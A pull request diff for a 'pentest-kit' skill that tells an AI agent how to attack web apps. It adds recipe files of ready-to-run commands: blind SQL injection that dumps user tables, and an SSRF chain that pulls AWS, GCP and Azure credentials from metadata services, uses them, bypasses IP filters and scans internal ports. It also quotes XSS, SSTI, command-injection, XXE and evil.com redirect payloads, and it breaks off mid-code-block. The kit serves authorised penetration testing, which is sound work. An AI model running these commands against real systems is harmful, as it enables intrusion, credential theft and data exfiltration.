### PR TITLE
fix(copilot): P0 critique fixes — event hooks, findings feedback, nmap cap, reasoning rewrite #61

### DIFF
--- a/.claude/skills/pentest-kit/SKILL.md
+++ b/.claude/skills/pentest-kit/SKILL.md
@@ -269,143 +269,131 @@ pentest-kit copilot resume <eng>     ← restarts loop from state + summary
 pentest-kit copilot turn <eng> --primitive resume  ← get full resume context
 ```
 
-**Reasoning strategy (CRITICAL — follow this every turn):**
+**Reasoning strategy (CRITICAL — think like an expert, not a checklist):**
+
+See `specs/PENTEST-REASONING.md` for the full reasoning model. Key points:
 
 ```
-EACH TURN:
-1. READ the observation from the previous turn response:
-   - dom_summary: what's on the page (title, forms, links, errors)
-   - dom_digest: if same as last turn, your action had no visible effect — try something else
-   - screenshot: look at it if dom_summary is ambiguous
-   - new auto-findings from interceptor (IDOR candidates, JWTs, missing headers)
+HYPOTHESIS-DRIVEN LOOP (every turn):
 
-2. DECIDE what to do next by asking yourself:
-   a. Am I still mapping? → navigate to an unmapped link or endpoint
-   b. Have I found something interesting? → test the hypothesis
-   c. Am I stuck on the same page? → try a different approach or move to another area
-   d. Am I logged in as the right role? → switch_role if needed
-   e. Have I tested this area enough? → move on, don't repeat
-   f. Have I covered all checklist categories? → check the WSTG checklist below
+  EXPLORE → OBSERVE → HYPOTHESIZE → TEST → INTERPRET → CHAIN → REPEAT
 
-3. EXECUTE exactly ONE primitive per turn:
-   - browser: for navigation, interaction, form filling
-   - http: for raw API testing (bypassing the UI)
-   - shell: for running tools (sqlmap, jwt_tool, ffuf, nuclei)
-   - note: to record what you found or what didn't work
+  EXPLORE (turns 1-15):
+    Browse as a normal user first. Sign up, log in, use features.
+    Build a mental model: what does this app do? What are the roles?
+    Map: pages, forms, APIs, file uploads, auth mechanism, tech stack.
 
-4. OBSERVE the response — look for:
-   - Error messages that leak info (stack traces, SQL errors, debug output)
-   - Status codes that differ between roles (403 as user → 200 as admin = IDOR)
-   - DOM changes after input (reflected content = potential XSS)
-   - New endpoints in endpoints.json (interceptor maps them automatically)
-   - Cookies / tokens changing (session fixation, JWT issues)
-   - Missing security headers in interceptor findings
-   - Sensitive data in responses (tokens, passwords, internal IPs)
+  OBSERVE:
+    What's interesting in the turn response?
+    - events.dialogs: XSS confirmed if alert() fired
+    - events.console_errors: CSP violations, stack traces, debug output
+    - events.response_errors: 500s, 403→200 between roles, leaked headers
+    - events.page_errors: broken middleware, auth bypass signals
+    - recent_findings: what have I already found? can I chain?
+    - dom_digest: same as last turn? my action had no effect
+    - interceptor auto-findings: IDOR candidates, JWTs, sensitive data
 
-5. If summary_prompt appears in the response:
-   → You've done 25 turns. Write a summary via note with type="summary".
-     Cover: what's mapped, current theory, findings so far, dead ends.
-     This summary is your memory for resume — make it count.
+  HYPOTHESIZE:
+    Form a specific, testable hypothesis:
+    "This /rest/products/search?q= endpoint echoes my input.
+     Hypothesis: it might be SQL-injectable."
+    NOT: "Let me run my SQLi checklist on everything."
+
+  TEST:
+    Execute ONE primitive to test the hypothesis.
+    Use the most appropriate:
+    - browser: UI interaction, XSS verification (watch for dialogs!)
+    - http: raw API requests, header manipulation, IDOR role comparison
+    - shell: tools (sqlmap, jwt_tool, ffuf, nuclei)
+    - note: record hypothesis BEFORE testing, result AFTER
+
+  INTERPRET:
+    Did the response confirm or deny?
+    - Status code changed? (200→500 = error-based injection signal)
+    - Response body different? (more data = IDOR, error = SQLi)
+    - Response TIME different? (slow = time-based blind injection)
+    - Dialog fired? (XSS confirmed)
+    - Console error? (CSP blocked it — try bypass)
+    If DENIED: don't give up. Try 3 variations before dead_end:
+      1. Different encoding (URL encode, double encode, unicode)
+      2. Different injection point (body, cookie, header instead of URL)
+      3. Different technique (time-based instead of error-based)
+
+  CHAIN:
+    After each finding, ask: "Can I combine this with anything?"
+    - IDOR + mass assignment = privilege escalation
+    - SQLi + hash cracking = account takeover
+    - Open redirect + OAuth = token theft
+    - SSRF + cloud metadata = credential extraction
+    - XSS + CSRF = authenticated action as victim
+    - Info disclosure + default creds = admin access
+
+  REPEAT:
+    Follow the evidence, not the checklist.
+    What's the next most interesting thing based on what I just learned?
+
+TECH STACK → ATTACK PRIORITIZATION:
+  After fingerprinting, adjust your approach:
+  Node.js/Express → prototype pollution, NoSQL injection, path traversal via %2f
+  JWT detected    → immediately: alg:none, key confusion, expiry bypass
+  File upload     → extension bypass, content-type, magic bytes, polyglot
+  GraphQL         → introspection, batch queries, nested DoS, IDOR via query
+  Angular SPA     → template injection, hash routing bypass
+  (See specs/PENTEST-REASONING.md for full stack→attack mapping)
+
+SCOPE CHECK:
+  Before every shell primitive, check engagement mode:
+  - blackbox: do NOT access target container internals (no docker cp/exec on target)
+  - graybox: source code access allowed, but no config changes
+  - whitebox: full access
+  If tempted to break scope, STOP and ask the user to expand scope.
 ```
 
-**WSTG-aligned attack checklist (work through this systematically):**
+**WSTG reference checklist (use as a coverage check, not as the driver):**
+
+After 30+ turns of hypothesis-driven testing, use this checklist to verify
+you haven't missed entire categories. Don't follow it linearly — use it as
+a "did I forget to check this area?" reference.
 
 ```
-PHASE 1 — RECONNAISSANCE (turns 1-15)
-□ RECON-01: tech stack fingerprint (response headers, error pages, /favicon.ico hash)
-□ RECON-02: robots.txt, sitemap.xml, .well-known/, security.txt
-□ RECON-03: JavaScript file analysis (API endpoints, secrets, internal URLs)
-□ RECON-04: content discovery with ffuf/feroxbuster (common paths, backup files)
-□ RECON-05: map all forms, inputs, file uploads, API endpoints
+□ RECON: tech fingerprint, robots.txt, JS analysis, content discovery, endpoint map
+□ CONFIG: security headers, cookie flags, CORS, HTTP methods, default creds, TLS, error handling
+□ AUTH: account enumeration, password reset, MFA bypass, lockout, session management, JWT
+□ AUTHZ: IDOR across roles, privilege escalation, path traversal, horizontal access
+□ INPUT: SQLi, XSS (check dialogs!), SSTI, command injection, SSRF, XXE, HPP, open redirect, file upload
+□ API: mass assignment, rate limiting, GraphQL, BOLA, API versioning
+□ LOGIC: price manipulation, workflow bypass, race conditions, coupon abuse
+□ CLIENT: clickjacking, postMessage, browser storage, prototype pollution, WebSocket
+```
 
-PHASE 2 — CONFIGURATION & HEADERS (turns 15-25)
-□ CONF-01: HTTP security headers check (CSP, HSTS, X-Frame, X-Content-Type, CORP)
-□ CONF-02: cookie flags (HttpOnly, Secure, SameSite) on every Set-Cookie
-□ CONF-03: CORS policy (send Origin: https://evil.com, check Access-Control-Allow)
-□ CONF-04: HTTP methods allowed (OPTIONS, PUT, DELETE, TRACE on each endpoint)
-□ CONF-05: default credentials on admin panels (/admin, /wp-admin, /phpmyadmin)
-□ CONF-06: TLS/SSL (pentest-kit exec testssl $TARGET or nmap --script ssl-enum-ciphers)
-□ CONF-07: error handling — send malformed input, missing params, wrong content-type
-         → look for stack traces, framework versions, internal paths
+**Pattern recipes (read before attacking a specific vuln type):**
 
-PHASE 3 — AUTHENTICATION (turns 25-40, needs auth.yaml)
-□ AUTH-01: account enumeration — different error for "user not found" vs "wrong password"?
-□ AUTH-02: password reset flow — token in URL? expires? rate limited? host header poisoning?
-□ AUTH-03: 2FA/MFA bypass — backup codes exposed? race condition? response manipulation?
-□ AUTH-04: lockout mechanism — does brute force trigger lockout? can lockout be bypassed?
-□ AUTH-05: session management:
-           - does session ID change after login? (fixation)
-           - does logout actually invalidate the token server-side?
-           - does session timeout after inactivity?
-           - is session ID high entropy? (check with browser.eval)
-□ AUTH-06: JWT analysis (if JWT detected by interceptor):
-           - pentest-kit exec jwt_tool <token> -T (tamper)
-           - test none algorithm, key confusion, expired token reuse
+When you identify a vulnerability type, read the corresponding pattern recipe
+from `patterns/` for step-by-step exploitation:
 
-PHASE 4 — AUTHORIZATION & ACCESS CONTROL (turns 40-55, use switch_role)
-□ AUTHZ-01: IDOR — same request as admin vs user vs anonymous (compare responses)
-□ AUTHZ-02: privilege escalation — user accessing admin-only endpoints
-□ AUTHZ-03: path traversal on file parameters (../../etc/passwd, ..%2f..%2f)
-□ AUTHZ-04: insecure direct object reference on IDs in URLs and request bodies
-□ AUTHZ-05: horizontal access — user A accessing user B's resources
-
-PHASE 5 — INPUT VALIDATION & INJECTION (turns 55-80)
-□ INPV-01: SQL injection on EVERY input field and URL parameter
-           - basic: ' OR 1=1-- , " OR ""="
-           - error-based: ' AND 1=CONVERT(int,@@version)--
-           - time-based: ' OR SLEEP(5)--
-           - use sqlmap for confirmed injectable params
-□ INPV-02: XSS on EVERY input that renders in the response
-           - reflected: <script>alert(1)</script>, "><img src=x onerror=alert(1)>
-           - stored: submit payload, navigate away, come back
-           - DOM: check URL fragments, document.location sinks
-□ INPV-03: SSTI on template-rendered inputs
-           - {{7*7}}, ${7*7}, #{7*7}, {7*7}, <%= 7*7 %>
-           - if 49 appears → confirmed, escalate with tplmap
-□ INPV-04: command injection on params that might reach shell
-           - ;id, |id, $(id), `id`, %0aid
-□ INPV-05: SSRF on URL parameters, webhooks, file fetchers, import URLs
-           - http://127.0.0.1, http://169.254.169.254 (cloud metadata)
-           - use Burp Collaborator or interactsh for blind SSRF
-□ INPV-06: XXE on XML endpoints (file upload, SOAP, API)
-           - <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
-□ INPV-07: HTTP parameter pollution — ?param=a&param=b (different behavior?)
-□ INPV-08: open redirect — check redirect/callback/next/url/return params
-           - //evil.com, /\evil.com, /%0d%0aLocation: evil.com
-□ INPV-09: file upload — bypass extension filters, content-type, magic bytes
-           - .php.jpg, .phtml, null byte, double extension
-
-PHASE 6 — API-SPECIFIC (if API endpoints found)
-□ API-01: mass assignment — add extra fields to POST/PUT (role, admin, isAdmin, price)
-□ API-02: rate limiting — rapid-fire login, password reset, OTP verification
-□ API-03: GraphQL introspection query → map all types, mutations, queries
-□ API-04: GraphQL batch queries, deeply nested queries (DoS)
-□ API-05: API versioning — /v1/ vs /v2/ (old versions may lack security fixes)
-□ API-06: BOLA — iterate numeric/UUID IDs on API endpoints across roles
-
-PHASE 7 — BUSINESS LOGIC (turns 80+)
-□ LOGIC-01: price/quantity manipulation (negative values, zero, overflow)
-□ LOGIC-02: workflow bypass (skip steps, reorder, replay)
-□ LOGIC-03: race conditions on state-changing operations (use shell: parallel curl)
-□ LOGIC-04: coupon/discount reuse, stacking
-□ LOGIC-05: feature abuse (email functionality for spam, file export for data theft)
-
-PHASE 8 — CLIENT-SIDE (ongoing, check as you browse)
-□ CLIENT-01: clickjacking — X-Frame-Options or CSP frame-ancestors present?
-□ CLIENT-02: postMessage — does the page listen? does it validate origin?
-□ CLIENT-03: browser storage — tokens/secrets in localStorage/sessionStorage?
-□ CLIENT-04: prototype pollution — __proto__, constructor.prototype in JSON params
-□ CLIENT-05: WebSocket — auth on connect? message validation? origin check?
+```
+patterns/union-sqli-extraction.md   — column count → schema → dump → crack
+patterns/jwt-attack-triage.md       — decode → algo check → forge variants
+patterns/idor-enumeration.md        — baseline → iterate IDs → diff responses
+patterns/auth-session-loop.md       — login → store token → use in requests
+patterns/file-upload-chains.md      — extension → content-type → magic bytes
+patterns/xxe-exploitation.md        — basic → parameter entities → OOB
+patterns/csrf-origin-crafting.md    — headers → method confusion → SameSite bypass
+patterns/nosql-operator-catalog.md  — $ne, $where, $gt with contexts
+patterns/graphql-introspection.md   — detect → schema dump → query abuse
+patterns/cloud-metadata-ssrf.md     — 169.254.169.254 → credentials → escalation
 ```
 
 **ANTI-PATTERNS (avoid these):**
-- Don't navigate to the same page 3+ times without changing your approach
-- Don't test the same input twice — record it as a dead_end note and move on
+- Don't follow the WSTG checklist linearly — follow the evidence
+- Don't try once and record dead_end — try 3 variations first
+- Don't test without a hypothesis — "let me try SQLi everywhere" wastes turns
+- Don't ignore events.dialogs — if alert() fires, XSS is confirmed
+- Don't ignore recent_findings — chain your discoveries
 - Don't forget to switch roles — test the same endpoint as admin AND user
-- Don't ignore interceptor auto-findings — they're free intelligence
-- Don't run heavy tools (sqlmap, ffuf) before mapping the target first
-- Don't skip phases — follow the checklist order, it's designed to build context
+- Don't run heavy tools (sqlmap, ffuf) before mapping the target
 - Don't report theoretical findings — every vulnerability needs a working PoC
+- Don't break engagement scope — check blackbox/graybox/whitebox before shell commands
 
 Traffic is auto-intercepted by mitmproxy + `tools/copilot/interceptor.py`.
 The interceptor auto-detects IDOR candidates, JWTs, UUIDs, sensitive data,

--- a/.claude/skills/pentest-kit/patterns/auth-session-loop.md
+++ b/.claude/skills/pentest-kit/patterns/auth-session-loop.md
@@ -1,0 +1,134 @@
+# Pattern: Auth Session Management Loop
+
+## When to use
+
+- Testing authenticated endpoints that require session tokens or cookies
+- Need to maintain authenticated state across multiple requests
+- Testing token expiry, refresh mechanisms, and session fixation
+- Automating login-then-test workflows
+
+## Prerequisites
+
+- Valid credentials or registration endpoint
+- Identified authentication mechanism (JWT, cookie, API key, OAuth)
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Identify the authentication mechanism
+
+Inspect the login response to determine how the session is managed.
+
+```bash
+pentest-kit exec bash -c "curl -sk -v '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"testuser\",\"password\":\"testpass\"}' 2>&1 | grep -iE '(set-cookie|authorization|token|session|x-auth)'"
+```
+
+### Step 2: Perform login and extract the token
+
+For JSON token-based auth:
+
+```bash
+pentest-kit exec bash -c "RESP=\$(curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"testuser\",\"password\":\"testpass\"}'); echo \$RESP > /tmp/auth-resp.json; TOKEN=\$(echo \$RESP | python3 -c 'import sys,json; print(json.load(sys.stdin).get(\"token\",json.load(open(\"/tmp/auth-resp.json\")).get(\"access_token\",\"NOTFOUND\")))'); echo \$TOKEN > /tmp/auth-token.txt; echo \"Token: \$TOKEN\""
+```
+
+For cookie-based auth:
+
+```bash
+pentest-kit exec bash -c "curl -sk -c /tmp/auth-cookies.txt '$TARGET/login' -X POST -d 'username=testuser&password=testpass' -L && cat /tmp/auth-cookies.txt"
+```
+
+### Step 3: Use the token in authenticated requests
+
+```bash
+pentest-kit exec bash -c "TOKEN=\$(cat /tmp/auth-token.txt); curl -sk '$TARGET/api/profile' -H \"Authorization: Bearer \$TOKEN\" -o /tmp/auth-profile.json && cat /tmp/auth-profile.json | python3 -m json.tool"
+```
+
+For cookie-based:
+
+```bash
+pentest-kit exec bash -c "curl -sk -b /tmp/auth-cookies.txt '$TARGET/dashboard' -o /tmp/auth-dash.html && head -30 /tmp/auth-dash.html"
+```
+
+### Step 4: Detect token expiry
+
+Send requests with the token and monitor for 401/403 responses.
+
+```bash
+pentest-kit exec bash -c "TOKEN=\$(cat /tmp/auth-token.txt); for i in \$(seq 1 10); do CODE=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/profile' -H \"Authorization: Bearer \$TOKEN\"); echo \"Request \$i -> HTTP \$CODE\"; sleep 60; done"
+```
+
+### Step 5: Test token refresh mechanism
+
+```bash
+pentest-kit exec bash -c "TOKEN=\$(cat /tmp/auth-token.txt); curl -sk '$TARGET/api/refresh' -X POST -H \"Authorization: Bearer \$TOKEN\" -H 'Content-Type: application/json' -o /tmp/auth-refresh.json && cat /tmp/auth-refresh.json | python3 -m json.tool"
+```
+
+### Step 6: Test session fixation
+
+Check if the session ID changes after authentication.
+
+```bash
+pentest-kit exec bash -c "PRE=\$(curl -sk -c - '$TARGET/login' | grep -i session); echo \"Pre-auth: \$PRE\"; POST=\$(curl -sk -c - '$TARGET/login' -X POST -d 'username=testuser&password=testpass' -L | grep -i session); echo \"Post-auth: \$POST\""
+```
+
+If the session ID is identical before and after login, session fixation is possible.
+
+### Step 7: Test logout invalidation
+
+Verify that tokens are actually invalidated after logout.
+
+```bash
+pentest-kit exec bash -c "TOKEN=\$(cat /tmp/auth-token.txt); curl -sk '$TARGET/api/logout' -X POST -H \"Authorization: Bearer \$TOKEN\" -o /tmp/auth-logout.json && echo 'Logout response:' && cat /tmp/auth-logout.json"
+```
+
+```bash
+pentest-kit exec bash -c "TOKEN=\$(cat /tmp/auth-token.txt); CODE=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/profile' -H \"Authorization: Bearer \$TOKEN\"); echo \"Post-logout access: HTTP \$CODE\""
+```
+
+If HTTP 200 is returned after logout, the server is not invalidating tokens.
+
+### Step 8: Test concurrent sessions
+
+Login from two sessions and check if the first is invalidated.
+
+```bash
+pentest-kit exec bash -c "T1=\$(curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"testuser\",\"password\":\"testpass\"}' | python3 -c 'import sys,json; print(json.load(sys.stdin)[\"token\"])'); T2=\$(curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"testuser\",\"password\":\"testpass\"}' | python3 -c 'import sys,json; print(json.load(sys.stdin)[\"token\"])'); echo \"T1 status: \$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/profile' -H \"Authorization: Bearer \$T1\")\"; echo \"T2 status: \$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/profile' -H \"Authorization: Bearer \$T2\")\""
+```
+
+### Step 9: Build reusable auth wrapper for other patterns
+
+Create a helper script that auto-refreshes and retries on 401.
+
+```bash
+pentest-kit exec bash -c "cat > /tmp/auth-curl.sh << 'SCRIPT'
+#!/bin/bash
+TOKEN_FILE=/tmp/auth-token.txt
+TOKEN=\$(cat \$TOKEN_FILE 2>/dev/null)
+RESP=\$(curl -sk -o /tmp/auth-body.txt -w '%{http_code}' \"\$@\" -H \"Authorization: Bearer \$TOKEN\")
+if [ \"\$RESP\" = \"401\" ]; then
+  NEW=\$(curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"testuser\",\"password\":\"testpass\"}' | python3 -c 'import sys,json; print(json.load(sys.stdin)[\"token\"])')
+  echo \$NEW > \$TOKEN_FILE
+  curl -sk -o /tmp/auth-body.txt -w '%{http_code}' \"\$@\" -H \"Authorization: Bearer \$NEW\"
+else
+  echo \$RESP
+fi
+cat /tmp/auth-body.txt
+SCRIPT
+chmod +x /tmp/auth-curl.sh && echo 'Auth wrapper created at /tmp/auth-curl.sh'"
+```
+
+## Common pitfalls
+
+- **CSRF tokens**: Login forms may require a CSRF token fetched from the login page first.
+- **Cookie domain/path**: Cookies scoped to specific paths will not be sent on other paths.
+- **Token in multiple places**: Some apps expect tokens in both headers and cookies simultaneously.
+- **Rate limiting on login**: Space login attempts to avoid account lockout.
+- **Refresh token rotation**: Some servers issue new refresh tokens with each refresh. Store the latest.
+
+## Chain opportunities
+
+- **Combine with IDOR**: Use authenticated sessions to test authorization boundaries between users.
+- **Combine with CSRF**: Test if authenticated state persists cross-origin.
+- **Combine with JWT attacks**: Decode extracted tokens and apply JWT attack pattern.
+- **Session riding**: Use active session for privilege escalation testing.
+- **Token leakage**: Check if tokens appear in URL params, Referer headers, or logs.

--- a/.claude/skills/pentest-kit/patterns/blind-sqli-extraction.md
+++ b/.claude/skills/pentest-kit/patterns/blind-sqli-extraction.md
@@ -1,0 +1,110 @@
+# Pattern: Blind SQL Injection Data Extraction
+
+Systematic blind SQLi workflow: detect with boolean-based inference, confirm with time-based delays, extract data character by character.
+
+## When to use
+
+- Application shows no SQL errors in responses (error-based SQLi is not possible)
+- Responses differ subtly between true/false conditions (boolean-based)
+- No visible difference at all but timing side-channels exist (time-based)
+- Need to extract database names, tables, credentials from a blind injection point
+
+## Step-by-step
+
+### Step 1: Identify candidate injection points
+
+Look for parameters that influence query results (IDs, filters, search terms).
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/product?id=1' -o /tmp/sqli-base.html && wc -c /tmp/sqli-base.html"
+```
+
+### Step 2: Boolean-based detection — true vs false
+
+Inject always-true and always-false conditions. Compare response size or content.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/product?id=1 AND 1=1--' -o /tmp/sqli-true.html && wc -c /tmp/sqli-true.html"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/product?id=1 AND 1=2--' -o /tmp/sqli-false.html && wc -c /tmp/sqli-false.html"
+```
+
+If file sizes differ, boolean-based blind SQLi is confirmed.
+
+### Step 3: Time-based detection — confirm with SLEEP
+
+When boolean gives no visible difference, use time delays.
+
+```bash
+pentest-kit exec bash -c "time curl -sk '$TARGET/product?id=1; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--' -o /dev/null"
+```
+
+MySQL variant:
+
+```bash
+pentest-kit exec bash -c "time curl -sk '$TARGET/product?id=1 AND IF(1=1,SLEEP(5),0)--' -o /dev/null"
+```
+
+MSSQL variant:
+
+```bash
+pentest-kit exec bash -c "time curl -sk '$TARGET/product?id=1; WAITFOR DELAY '00:00:05'--' -o /dev/null"
+```
+
+A 5-second delay confirms time-based blind SQLi.
+
+### Step 4: Determine database type
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/product?id=1 AND 1=(SELECT 1 FROM information_schema.tables LIMIT 1)--' -o /tmp/sqli-dbtype.html && wc -c /tmp/sqli-dbtype.html"
+```
+
+### Step 5: Extract database name length
+
+```bash
+pentest-kit exec bash -c "for len in \$(seq 1 20); do resp=\$(curl -sk -o /dev/null -w '%{size_download}' '$TARGET/product?id=1 AND LENGTH(database())='\$len'--'); echo \"len=\$len size=\$resp\"; done"
+```
+
+### Step 6: Extract database name character by character
+
+```bash
+pentest-kit exec bash -c "for pos in \$(seq 1 8); do for c in \$(seq 32 126); do resp=\$(curl -sk -o /dev/null -w '%{size_download}' '$TARGET/product?id=1 AND ASCII(SUBSTRING(database(),'\$pos',1))='\$c'--'); if [ \"\$resp\" != \"0\" ]; then echo \"pos=\$pos char=\$(printf '\\x'\$(printf '%02x' \$c))\"; break; fi; done; done"
+```
+
+### Step 7: Extract table names
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/product?id=1 AND SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)='u'--' -o /tmp/sqli-table.html && wc -c /tmp/sqli-table.html"
+```
+
+### Step 8: Automate with sqlmap
+
+Once injection point is confirmed, hand off to sqlmap for full extraction.
+
+```bash
+pentest-kit exec bash -c "sqlmap -u '$TARGET/product?id=1' --batch --level=3 --risk=2 --technique=BT --dbs --output-dir=/tmp/sqlmap-out"
+```
+
+```bash
+pentest-kit exec bash -c "sqlmap -u '$TARGET/product?id=1' --batch -D targetdb --tables --output-dir=/tmp/sqlmap-out"
+```
+
+```bash
+pentest-kit exec bash -c "sqlmap -u '$TARGET/product?id=1' --batch -D targetdb -T users --dump --output-dir=/tmp/sqlmap-out"
+```
+
+## Common pitfalls
+
+- URL-encode spaces as `+` or `%20` — raw spaces break query strings
+- WAFs block `UNION`, `SELECT`, `SLEEP` — use case alternation (`SeLeCt`) or inline comments (`S/**/ELECT`)
+- Cookie-based injection requires `-b` flag with session cookie
+- Time-based is slow — use binary search on ASCII values to cut requests in half
+
+## Chain opportunities
+
+- Blind SQLi + credential dump: extract admin password hashes, crack offline
+- Blind SQLi + file read: `LOAD_FILE('/etc/passwd')` on MySQL with FILE privilege
+- Blind SQLi + OS command: `xp_cmdshell` on MSSQL, `COPY TO PROGRAM` on PostgreSQL
+- Blind SQLi + second-order: injected value stored, triggered in different query later

--- a/.claude/skills/pentest-kit/patterns/cloud-metadata-ssrf.md
+++ b/.claude/skills/pentest-kit/patterns/cloud-metadata-ssrf.md
@@ -1,0 +1,143 @@
+# Pattern: Cloud Metadata SSRF Chain
+
+## When to use
+
+- Application has SSRF vulnerability (URL fetch, webhook, image proxy, PDF renderer)
+- Target is hosted on AWS, GCP, Azure, or DigitalOcean cloud infrastructure
+- Goal is to extract cloud credentials from the metadata service and escalate privileges
+
+## Prerequisites
+
+- Confirmed or suspected SSRF vector (parameter that fetches URLs server-side)
+- Knowledge of cloud provider (check response headers, DNS, IP ranges)
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Confirm SSRF with an external callback
+
+Use a Burp Collaborator, webhook.site, or controlled server to confirm the server makes outbound requests.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://ATTACKER_SERVER/ssrf-test' -o /tmp/ssrf-confirm.txt && cat /tmp/ssrf-confirm.txt"
+```
+
+Check your server logs for the incoming request. Note the source IP and User-Agent.
+
+### Step 2: Probe the AWS metadata service (IMDSv1)
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/latest/meta-data/' -o /tmp/ssrf-meta.txt && cat /tmp/ssrf-meta.txt"
+```
+
+If the response lists metadata categories (ami-id, hostname, iam, etc.), the instance is on AWS with IMDSv1.
+
+### Step 3: Extract IAM role credentials (AWS)
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/' -o /tmp/ssrf-role.txt && cat /tmp/ssrf-role.txt"
+```
+
+```bash
+pentest-kit exec bash -c "ROLE=\$(cat /tmp/ssrf-role.txt | head -1); curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'\$ROLE -o /tmp/ssrf-creds.json && cat /tmp/ssrf-creds.json | python3 -m json.tool"
+```
+
+Extract AccessKeyId, SecretAccessKey, and Token from the response.
+
+### Step 4: Handle IMDSv2 (token required)
+
+IMDSv2 requires a PUT request to get a session token first. Most SSRF vectors only support GET, but test if the application follows redirects or allows method control.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/latest/api/token' -o /tmp/ssrf-imdsv2.txt && cat /tmp/ssrf-imdsv2.txt"
+```
+
+If blocked, try bypass techniques:
+
+```bash
+pentest-kit exec bash -c "for IP in '169.254.169.254' '0xa9fea9fe' '2852039166' '169.254.169.254.nip.io' '[::ffff:169.254.169.254]' '169.254.169.254:80'; do echo \"--- \$IP ---\"; curl -sk '$TARGET/api/fetch?url=http://'\$IP'/latest/meta-data/' 2>&1 | head -3; done"
+```
+
+### Step 5: Probe GCP metadata service
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://metadata.google.internal/computeMetadata/v1/?recursive=true' -o /tmp/ssrf-gcp.txt && cat /tmp/ssrf-gcp.txt | head -50"
+```
+
+GCP requires `Metadata-Flavor: Google` header. Test if the application passes custom headers:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' -o /tmp/ssrf-gcp-token.txt && cat /tmp/ssrf-gcp-token.txt"
+```
+
+### Step 6: Probe Azure metadata service
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01' -o /tmp/ssrf-azure.txt && cat /tmp/ssrf-azure.txt | head -50"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -o /tmp/ssrf-azure-token.txt && cat /tmp/ssrf-azure-token.txt"
+```
+
+### Step 7: Probe DigitalOcean metadata service
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/metadata/v1.json' -o /tmp/ssrf-do.txt && cat /tmp/ssrf-do.txt | python3 -m json.tool"
+```
+
+### Step 8: Use extracted AWS credentials
+
+```bash
+pentest-kit exec bash -c "export AWS_ACCESS_KEY_ID='EXTRACTED_KEY'; export AWS_SECRET_ACCESS_KEY='EXTRACTED_SECRET'; export AWS_SESSION_TOKEN='EXTRACTED_TOKEN'; aws sts get-caller-identity 2>&1"
+```
+
+```bash
+pentest-kit exec bash -c "export AWS_ACCESS_KEY_ID='EXTRACTED_KEY'; export AWS_SECRET_ACCESS_KEY='EXTRACTED_SECRET'; export AWS_SESSION_TOKEN='EXTRACTED_TOKEN'; aws s3 ls 2>&1 | head -20"
+```
+
+```bash
+pentest-kit exec bash -c "export AWS_ACCESS_KEY_ID='EXTRACTED_KEY'; export AWS_SECRET_ACCESS_KEY='EXTRACTED_SECRET'; export AWS_SESSION_TOKEN='EXTRACTED_TOKEN'; aws iam list-attached-role-policies --role-name ROLE_NAME 2>&1"
+```
+
+### Step 9: Enumerate additional metadata endpoints
+
+```bash
+pentest-kit exec bash -c "for ENDPOINT in 'latest/meta-data/hostname' 'latest/meta-data/local-ipv4' 'latest/meta-data/public-ipv4' 'latest/meta-data/security-groups' 'latest/user-data' 'latest/meta-data/network/interfaces/macs/'; do echo \"--- \$ENDPOINT ---\"; curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/'\$ENDPOINT 2>&1 | head -3; done"
+```
+
+User-data often contains startup scripts with hardcoded credentials:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/fetch?url=http://169.254.169.254/latest/user-data' -o /tmp/ssrf-userdata.txt && cat /tmp/ssrf-userdata.txt"
+```
+
+### Step 10: Pivot to internal services
+
+Use SSRF to scan internal network and access services not exposed to the internet.
+
+```bash
+pentest-kit exec bash -c "for PORT in 80 443 8080 8443 3000 5000 6379 27017 5432 3306; do RESP=\$(curl -sk -o /dev/null -w '%{http_code}' --max-time 3 '$TARGET/api/fetch?url=http://127.0.0.1:'\$PORT'/'); echo \"localhost:\$PORT -> HTTP \$RESP\"; done"
+```
+
+```bash
